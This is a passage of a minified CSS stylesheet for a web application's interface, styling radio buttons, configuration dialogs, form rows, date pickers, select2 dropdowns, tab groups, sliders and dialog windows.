input[type="radio"].kui-radio{ font-size:14.4px;height:24px;width:24px !important;margin-right:0.8em;} input[type="radio"].kui-radio:before{ line-height:22px;} input[type="radio"].kui-radio.size-big{ font-size:15.6px;height:26px;width:26px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-big:before{ line-height:24px;} input[type="radio"].kui-radio.size-bigx{ font-size:19.2px;height:32px;width:32px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-bigx:before{ line-height:30px;} input[type="radio"].kui-radio:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="radio"].kui-radio.red:hover, input[type="radio"].kui-radio.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="radio"].kui-radio.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio.blue:hover, input[type="radio"].kui-radio.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="radio"].kui-radio.green:hover, input[type="radio"].kui-radio.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="radio"].kui-radio.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="radio"].kui-radio.yellow:hover, input[type="radio"].kui-radio.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="radio"].kui-radio.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="radio"].kui-radio.grey:hover, input[type="radio"].kui-radio.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="radio"].kui-radio.black:checked{ background:#444;border-color:#444 !important;} input[type="radio"].kui-radio.black:hover, input[type="radio"].kui-radio.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;}}.form-box{color:#444;}.form-box a{color:#5d9cec;text-decoration:none;}.form-box a:hover{color:#4a89dc;}.form-box .panel-body{position:relative;}.form-box .panel-body .line,.form-box .panel-body hr{border:none;height:1px;overflow:hidden;background:#ddd;margin:10px 30px;height:2px;background:transparent url("../../../images/common/line.png") repeat-x 0 0;}.form-box .panel-body h1,.form-box .panel-body h2,.form-box .panel-body h3,.form-box .panel-body h4,.form-box .panel-body h5{margin:0.6em 1em 0.5em 30px;padding-bottom:0.4em;border-bottom:1px solid #ddd;}.form-box.config-box .form-header{height:40px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#efefef', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-o-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);-pie-background:linear-gradient(to 60deg,#efefef 0%,#f5f7fa 100%);border-bottom:1px solid #ddd;}.form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:30px;font-size:14px;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-item-file{height:26px;width:26px;line-height:26px;text-align:center;border-radius:15%;display:inline-block;margin-right:10px;padding:0;color:#fff;position:relative;top:8px;}.form-box.config-box .form-header .modal-title img.x-font-icon,.form-box.config-box .form-header .modal-title .x-item-file.x-font-icon{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.form-box.config-box .form-header .modal-title img.font-icon-words,.form-box.config-box .form-header .modal-title .x-item-file.font-icon-words{font-size:10px;}.form-box.config-box .form-header .modal-title i{font-style:normal;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-font-icon{top:0px;}.form-box.config-box .panel-body{overflow:auto;border-radius:4px;padding:20px 0;position:absolute;left:0;right:0;top:42px;bottom:71px;margin:0;border:none;background:#fff;}.form-box .form-row{padding:3px 30px;padding-right:5px;width:auto;margin:1px 0;}.form-box .form-row:after{clear:both;}.form-box .form-row.form-group{margin:0;}.form-box .form-row label{margin-right:10px;display:inline;}.form-box .form-row input[type='radio']{display:inline-block;margin-right:10px;}.form-box .form-row input[type='text'],.form-box .form-row input[type='password'],.form-box .form-row input[type='number']{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;display:inline-block;height:28px;width:260px;color:#444;border-radius:4px;padding-left:0.5em;margin-right:10px;}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row select{min-width:268px;}.form-box .form-row textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:251px;height:100px;margin-right:10px;border-radius:2px;padding:8px;transition:none;}.form-box .form-row textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row textarea:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row .setting-title{height:30px;line-height:30px;width:140px;margin-right:20px;padding-top:5px;padding-left:5px;float:left;position:relative;text-align:right;}.form-box .form-row .setting-title .require{color:#ff5722;font-size:20px;position:absolute;margin-top:4px;padding:0 0 0 5px;}.form-box .form-row .setting-content{float:left;position:relative;width:70%;padding:5px;border-radius:4px;border:1px solid transparent;}.form-box .form-row .setting-content input.has-btn-right{width:220px;padding-right:40px;}.form-box .form-row .setting-content .input-btn-right{padding:0;margin-left:-50px;position:absolute;width:35px;height:30px;line-height:30px;border-radius:0 4px 4px 0;}.form-box .form-row .setting-content .input-btn-right .font-icon{font-size:14px;width:20px;padding:0 !important;}.form-box .form-row .setting-content input.has-btn-right:focus + .input-btn-right{border-color:#75a1f0;border-left-color:#c7d5ef;}.form-box .form-row .font-icon{padding:0;}.form-box .form-row .user-select{margin:0.5em 0;}.form-box .form-row.form-userSelect .setting-content{background:#f8fcff;padding:10px 5px;margin-top:-5px;}.form-box .form-row.form-userSelect .desc{margin-top:10px;}.form-box .form-row.error .setting-content{background:#ffefed;border-color:#ffb3ae;}.form-box .form-row.form-color .color-picker-view i{width:20px;height:20px;margin-top:5px;box-shadow:0 0 4px #666;display:inline-block;border-radius:2px;}.form-box .form-row .select2-container{width:270px !important;}.form-box .form-row .slider.slider-horizontal{width:260px;margin-right:20px;height:30px;}.form-box .form-row .slider .tooltip{pointer-events:none;}.form-box .form-row .desc,.form-box .form-row .setting-content i{color:#9ba3af;font-style:normal;}.form-box .ztree.group-list-tree a{border:none;padding-left:3px;}.form-box .ztree.group-list-tree a:hover{border:none;}.form-box .ztree.group-list-tree li a.curSelectedNode{color:#fff;}.form-box .ztree.group-list-tree .sub-menu{float:right;display:none;line-height:20px;padding-right:7px;font-size:1.15em;color:#ddd;}.form-box .ztree.group-list-tree .hover .sub-menu{display:inline-block;color:#666;}.form-box .ztree.group-list-tree .curSelectedNode .sub-menu,.form-box .ztree.group-list-tree .hover.curSelectedNode .sub-menu{display:inline-block;color:#fff;}.form-box-title-left .form-row .setting-title{text-align:left;}body .colorpicker{z-index:99999;}body .dialog-plugin-config.dialog-no-title .aui-outer{box-shadow:0 6px 40px 0 rgba(16,17,18,0.3);border:1px solid #ccc !important;border-radius:4px;overflow:hidden;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close{color:#bbb;color:rgba(0,0,0,0.2);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active{background:rgba(0,0,0,0.12);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active.aui-close{color:#fff;background:#e81123;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons{padding-right:20px;height:40px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons button{margin-top:5px;margin-left:20px;padding:0 2em;height:30px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset{background:none;border:none;box-shadow:none;padding:0px 10px;color:#bbb;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset:hover{color:#2196F3;background:#eaf5ff;}div.xdsoft_datetimepicker{border-top:2px solid #39f;padding:0;height:250px;color:#666;}div.xdsoft_datetimepicker .xdsoft_label,div.xdsoft_datetimepicker .xdsoft_month{text-align:center;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_label:hover,div.xdsoft_datetimepicker .xdsoft_month:hover{text-decoration:none;background:#e6f2ff;}div.xdsoft_datetimepicker .xdsoft_label:hover span,div.xdsoft_datetimepicker .xdsoft_month:hover span{color:#20a0ff;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select{box-shadow:0px 2px 10px rgba(0,0,0,0.2);border:1px solid rgba(0,0,0,0.1);max-height:300px;height:200px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_monthselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_monthselect{right:0px;width:90px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_yearselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_yearselect{right:0px;width:56px;}div.xdsoft_datetimepicker .xdsoft_scrollbar >.xdsoft_scroller{background:rgba(0,0,0,0.3) !important;}div.xdsoft_datetimepicker .xdsoft_calendar td,div.xdsoft_datetimepicker .xdsoft_calendar th{height:30px;text-align:center;background:none;border:none;}div.xdsoft_datetimepicker .xdsoft_calendar td div,div.xdsoft_datetimepicker .xdsoft_calendar th div{padding:0;}div.xdsoft_datetimepicker .xdsoft_calendar th{background:#eee;color:#444;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_datepicker{width:220px;margin-right:10px;}div.xdsoft_datetimepicker .xdsoft_datepicker.active+.xdsoft_timepicker{margin:0;}div.xdsoft_datetimepicker .xdsoft_timepicker{width:70px;border-left:1px solid #ddd;background:#fbfdff;margin:0;margin-left:-1px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_prev,div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_next{margin-left:20px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box{border:none;height:203px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box >div >div{background:none;border:none;}span.select2-container--default .select2-dropdown,span.select2-container--classic .select2-dropdown{box-shadow:0 2px 10px rgba(0,0,0,0.2);border:1px solid #ccc;overflow:hidden;}span.select2-container--default .select2-dropdown .select2-search__field,span.select2-container--classic .select2-dropdown .select2-search__field{border:1px solid #ccc;}span.select2-container--default .select2-selection--multiple,span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--multiple,span.select2-container--classic .select2-selection--single{border:1px solid #ccc;border-radius:4px;outline:none;min-height:32px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice,span.select2-container--default .select2-selection--single .select2-selection__choice,span.select2-container--classic .select2-selection--multiple .select2-selection__choice,span.select2-container--classic .select2-selection--single .select2-selection__choice{background-color:#edf5ff;color:#3a96ff;border-color:#badaff;height:24px;line-height:22px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove{float:right;font-size:15px;color:#3a96ff;width:20px;height:22px;line-height:18px;text-align:center;margin-right:-2px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover{color:#0063d3;}span.select2-container--default.select2-container--focus .select2-selection--multiple,span.select2-container--default.select2-container--focus .select2-selection--single,span.select2-container--classic.select2-container--focus .select2-selection--multiple,span.select2-container--classic.select2-container--focus .select2-selection--single{border:1px solid #3a96ff;}span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--single{background:#f8f8f8 url("../../../images/common//bg.gif") 0px -10px repeat-x;}span.select2-container--default .select2-selection--single .select2-selection__arrow,span.select2-container--classic .select2-selection--single .select2-selection__arrow{height:30px;width:26px;}span.select2-container--default .select2-selection--multiple ul.select2-selection__rendered:after,span.select2-container--classic .select2-selection--multiple ul.select2-selection__rendered:after{content:"";width:23px;height:50%;display:block;color:#aaa;position:absolute;right:1px;top:50%;margin-top:-7px;text-align:center;font-family:FontAwesome;}span.select2-container--default .select2-selection--multiple .select2-search--inline,span.select2-container--classic .select2-selection--multiple .select2-search--inline{height:29px;line-height:23px;}span.select2-container--default .select2-results.group-list-content>.select2-results__options,span.select2-container--classic .select2-results.group-list-content>.select2-results__options{z-index:100;width:100%;height:250px;max-height:250px;}span.select2-container--default .select2-results__option,span.select2-container--classic .select2-results__option{position:relative;}span.select2-container--default .select2-search--inline .select2-search__field,span.select2-container--classic .select2-search--inline .select2-search__field{padding-top:1px;}span.select2-container--default .select2-results__option[aria-selected=true],span.select2-container--default .select2-results__option[aria-selected=true].select2-results__option--highlighted,span.select2-container--classic .select2-results__option[aria-selected=true],span.select2-container--classic .select2-results__option[aria-selected=true].select2-results__option--highlighted{background:#edf5ff;color:#3a96ff;}span.select2-container--default .select2-results__option[aria-selected=true]:after,span.select2-container--classic .select2-results__option[aria-selected=true]:after{content:"\f00c";color:#3a96ff;position:absolute;right:10px;font-size:14px;font-family:FontAwesome;}span.select2-container--default .select2-results__option--highlighted[aria-selected],span.select2-container--classic .select2-results__option--highlighted[aria-selected]{background-color:#eee;color:#444;}span.select2-container--default.select2-container--open.select2-container--above .select2-selection--single,span.select2-container--classic.select2-container--open.select2-container--above .select2-selection--single{border-top:1px solid transparent;}span.select2-container--default.select2-container--open.select2-container--below .select2-selection--multiple,span.select2-container--classic.select2-container--open.select2-container--below .select2-selection--multiple{border-bottom:1px solid transparent;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--below,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--below{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:-1px;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--above,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--above{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:1px;box-shadow:0 -2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default.select2-container--open .select2-selection--multiple,span.select2-container--default.select2-container--open .select2-selection--single,span.select2-container--classic.select2-container--open .select2-selection--multiple,span.select2-container--classic.select2-container--open .select2-selection--single{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default .ztree,span.select2-container--classic .ztree{padding:0;}span.select2-container--default .ztree li a,span.select2-container--classic .ztree li a{padding-left:0;height:26px;line-height:26px;border:none;margin:0;border-radius:0;}span.select2-container--default .ztree li a.this,span.select2-container--classic .ztree li a.this{background:#edf5ff;border:none;height:26px;line-height:26px;}span.select2-container--default .ztree li a.this:hover,span.select2-container--classic .ztree li a.this:hover{color:#3a96ff;}span.select2-container--default .ztree li a:hover,span.select2-container--classic .ztree li a:hover{border:none;margin:0;border-radius:0;color:#3a96ff;}span.select2-container--default .ztree .check-icon,span.select2-container--classic .ztree .check-icon{float:right;color:#fff;font-size:12px;text-align:center;width:15px;height:15px;line-height:15px;padding:0;margin-top:5px;margin-right:5px;-webkit-transition:all .1s ease-in-out;-moz-transition:all .1s ease-in-out;-o-transition:all .1s ease-in-out;-ms-transition:all .1s ease-in-out;transition:all .1s ease-in-out;}span.select2-container--default .ztree .check-icon:before,span.select2-container--classic .ztree .check-icon:before{content:"\f";}span.select2-container--default .ztree a.this .check-icon:before,span.select2-container--classic .ztree a.this .check-icon:before{content:"\f00c";color:#3a96ff;}body .select2-container{width:270px;margin-right:10px;}.tab-group{text-align:center;margin-bottom:-12px;}.tab-group .tab-item{background:#fff;text-align:left;display:inline-block;margin-left:-5px;border:1px solid #ccc;border-bottom-color:#a6a6a6;border-right-color:#b8b8b8;}.tab-group .tab-item:hover{background:#e6e6e6;}.tab-group .tab-item:first-child{border-top-left-radius:3px;border-bottom-left-radius:3px;}.tab-group .tab-item:last-child{border-top-right-radius:3px;border-bottom-right-radius:3px;}.tab-group .tab-item a{text-decoration:none;color:#444;padding:0 15px;height:24px;display:inline-block;line-height:24px;}.tab-group .tab-item.active a{color:#fff;}.tab-group .tab-item.active,.tab-group .tab-item.active:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#6eb4f7', endColorstr='#1a82fb');background-image:-webkit-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-moz-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-o-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-ms-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);-pie-background:linear-gradient(to to bottom,#6eb4f7 0,#1a82fb 100%);color:#fff;z-index:10;border-color:#3f87dc;border-top-color:#4396e6;border-color:#388df8 #388df8 #0866dc transparent;}.tab-group .tab-item.active:hover,.tab-group .tab-item.active:active{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#3e9bf4', endColorstr='#0469de');background-image:-webkit-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-moz-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-o-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-ms-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);-pie-background:linear-gradient(to to bottom,#3e9bf4 0,#0469de 100%);}.tab-group .tab-item:last-child.active,.tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .slider .slider-track{background:#ddd;box-shadow:none;}body .slider.slider-horizontal .slider-track{height:6px;}body .slider .slider-selection{transition:background-color .3s ease;background:#2196f3;box-shadow:none;}body .slider .slider-handle{margin-left:-7px;margin-top:-6px;width:14px;height:14px;cursor:pointer;border-radius:50%;border:2px solid #88c7f4;background:#fff;transition:border-color .3s ease, transform .3s cubic-bezier(.18,.89,.32,1.28);}body .slider .slider-handle.round:hover{box-shadow:0 0 0 6px rgba(150,219,250,0.7);}body .slider .tooltip{transition:all 0.168s cubic-bezier(0,0.84,0.58,1);}body .slider .tooltip.top{margin-top:-43px;}body .slider .tooltip.bottom{margin-top:20px;}body .slider .tooltip.top .tooltip-arrow{border-top-color:rgba(0,0,0,0.7);}body .slider .tooltip.bottom .tooltip-arrow{border-bottom-color:rgba(0,0,0,0.7);}body .slider .tooltip-inner{background-color:rgba(0,0,0,0.7);box-shadow:0 1px 5px rgba(0,0,0,0.2);padding:8px 15px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .aui-outer .aui-buttons{box-shadow:0 0 20px #ddd;border-top:1px solid #eee;height:45px;padding-top:5px;border-top:none;background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{left:130px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{position:absolute;left:0;padding:0;width:140px;height:100%;padding-top:20px;z-index:99999;background:#f5f7fa;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{display:block;border:none;background:none;border-radius:0;font-size:14px;-webkit-transition:0.16s all;-moz-transition:0.16s all;-o-transition:0.16s all;-ms-transition:0.16s all;transition:0.16s all;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:hover{background:#eee;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:first-child,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child{border-radius:0;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item a{padding:0 20px 0 15px;display:block;height:40px;line-height:40px;text-align:right;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover a,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header{height:40px;border-bottom:1px solid #adabad;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#d3d1d3', endColorstr='#e7e5e7');background-image:-webkit-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-moz-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-o-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-ms-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);-pie-background:linear-gradient(to bottom,#d3d1d3 0%,#e7e5e7 100%);}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:20px;font-size:12px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title img,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title .x-item-file{height:22px;width:22px;top:8px;margin-right:4px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row .setting-title{text-align:right;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.form-userSelect .setting-content{background:#f4f4f4;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.error .setting-content{background:#ffefed;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body{background:#eee;border:1px solid #e3e3e3;margin:20px;top:60px;bottom:30px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body .line,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body hr{border-color:#ddd;}body .dialog-plugin-config.dialog-form-style-mac .tab-group{position:absolute;margin-top:25px;width:100%;z-index:999;}body .dialog-plugin-config.dialog-form-style-mac .aui-content{background:#f9f9f9;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons{padding-right:20px;height:30px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);background:#f9f9f9;border:none;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons button{margin-top:1px;margin-left:20px;padding:0 2em;height:25px;}.message-box{position:absolute;top:15%;left:0px;z-index:88;background:#63acff;color:#fff;opacity:0.7;filter:alpha(opacity=70);-webkit-border-radius:1px;-moz-border-radius:1px;border-radius:1px;-webkit-box-shadow:0 10px 60px rgba(0,0,0,0.6);-moz-box-shadow:0 10px 60px rgba(0,0,0,0.6);box-shadow:0 10px 60px rgba(0,0,0,0.6);display:none;}.message-box .content{padding:10px 30px;line-height:20px;width:auto;}.aui-outer{text-align:left;position:relative;}.aui-mask{position:absolute;width:100%;height:100%;background:#fff;opacity:0.01;filter:alpha(opacity=1);}.aui-loading{height:100%;width:100%;overflow:hidden;opacity:0.7;filter:alpha(opacity=70);position:absolute;left:0;top:40px;z-index:9999;text-align:center;text-indent:-999em;}.aui-loading span{width:80px;height:80px;border-radius:6px;background:#fff url("../../../images/common/dialog/dialog_loading.gif") no-repeat center center;position:absolute;left:50%;top:50%;margin-left:-40px;margin-top:-40px;}table.aui-border,table.aui-dialog{width:100%;border:0;margin:0;border-collapse:collapse;}.aui-nw,.aui-n,.aui-ne,.aui-w,.aui-c,.aui-e,.aui-sw,.aui-s,.aui-se,.aui-header,.aui-td-icon,.aui-main,.aui-footer{padding:0;}.aui-header,.aui-buttons button{font:12px/1.11;}.aui-title{overflow:hidden;text-overflow:ellipsis;font-size:1em;}.aui-title img,.aui-title .x-item-file{width:20px;margin-right:5px;border-radius:4px;cursor:pointer;pointer-events:all;}.aui-title img:hover,.aui-title .x-item-file:hover{transform:scale(1.1,1.1);}.aui-state-no-title .aui-title{display:none;}.aui-main{font-size:1.1em;text-align:center;background:#FFF;min-width:9em;min-width:0 \9;visibility:auto;}.aui-content{text-align:left;color:#666;border:none 0;}.aui-content{width:100%;height:100%;}.aui-content.aui-state-full{display:block;width:100%;margin:0;padding:0 !important;height:100%;}.aui-icon{vertical-align:middle;background:#fff;}.aui-icon div{width:48px;height:48px;margin:10px 0 10px 10px;background-position:center center;background-repeat:no-repeat;}.aui-buttons{padding:10px 8px;text-align:right;white-space:nowrap;background-color:#F6F6F6;border-top:solid 1px #DADEE5;}.aui-buttons button{margin-left:15px;padding:3px 20px;height:25px;cursor:pointer;display:inline-block;text-align:center;line-height:1;overflow:visible;color:#000000;border:none;background:#aaa;color:#fff;}.aui-buttons button:focus{outline:none 0;}.aui-buttons button:hover{background:#c4c4c4;}.aui-buttons button:active{background:#777777;}.aui-buttons button[disabled]{cursor:default;color:#919191;background:#aaa;opacity:0.5;filter:alpha(opacity=50);}.aui-buttons 